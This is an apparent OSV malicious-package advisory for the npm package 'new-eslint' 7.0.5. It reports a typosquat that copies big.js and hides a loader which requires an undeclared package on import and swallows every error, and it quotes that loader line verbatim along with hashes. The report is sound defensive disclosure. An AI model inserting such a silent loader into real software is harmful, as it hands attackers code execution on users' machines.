{"id":"MAL-2026-6224","summary":"Malicious code in new-eslint (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (6f068a5c7ad1a53c60d794a3b4585418956c176c42b8d5d90855e2ac60962b25)\nPackage is published as 'new-eslint' but ships a verbatim copy of MikeMcl/big.js, with a hidden loader injected mid-file between P.minus and P.mod in both big.js:605 and big.mjs:605: `const helper = require(\"ts-eslint-helper\"); helper.from_str().then(e =\u003e e).catch(e =\u003e { });`. This require fires whenever a consumer imports or requires the package and silently swallows all errors. The required package `ts-eslint-helper` is not declared in package.json — the manifest lists a different package, `eslint-helper@4.0.1` — so the loaded code is undeclared and attacker-mutable. The README claims 'no dependencies' and describes big.js, while the package name impersonates eslint tooling: classic typosquat lure plus hidden remote-controlled loader. Whatever `ts-eslint-helper.from_str()` does runs in the installer's process on import with no advertised functionality justifying it.\n","modified":"2026-06-19T15:47:26.789307160Z","published":"2026-06-19T14:23:59Z","database_specific":{"malicious-packages-origins":[{"versions":["7.0.5"],"modified_time":"2026-06-19T14:23:59Z","sha256":"6f068a5c7ad1a53c60d794a3b4585418956c176c42b8d5d90855e2ac60962b25","id":"IN-MAL-2026-007067","source":"amazon-inspector","import_time":"2026-06-19T15:41:55.008216882Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/new-eslint/v/7.0.5"}],"affected":[{"package":{"name":"new-eslint","ecosystem":"npm","purl":"pkg:npm/new-eslint"},"versions":["7.0.5"],"database_specific":{"indicators":{"evidence_files":[{"path":"package.json","sha256":"a561aa99a23974fceafd4b2bc8eb050fe3159a0328fd73ea8e3e1bc599e288cb","tlsh":"0921f267c9a19db70af85b98b8ac43aaf1151b1f01a14c5bb07b131c4b3345b2096bbd"},{"path":"big.js","sha256":"d1f1baf7ef7571122bd26e3676d6f2dcf7cc7fd7dc9cdec4c3b75535ad0e3bbf","tlsh":"9cc2658c3ac67579593363788f465088eb38525712c8b286b4ae62b46f78cb107b4fdc"}],"package_integrity":[{"hashes":{"sha512_sri":"sha512-IihA49/Cnl7beKKA/JFi/8TjMLCEtL4GjE2qZ31odOxQPNV5KxZA/8n9xfjIc3ZzYlFjVXS73unbfEtRGuCShQ==","sha1":"5caff974ef503bc10fb120958e1b78330bae7c02"},"filename":"new-eslint-7.0.5.tgz"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/new-eslint/MAL-2026-6224.json","cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}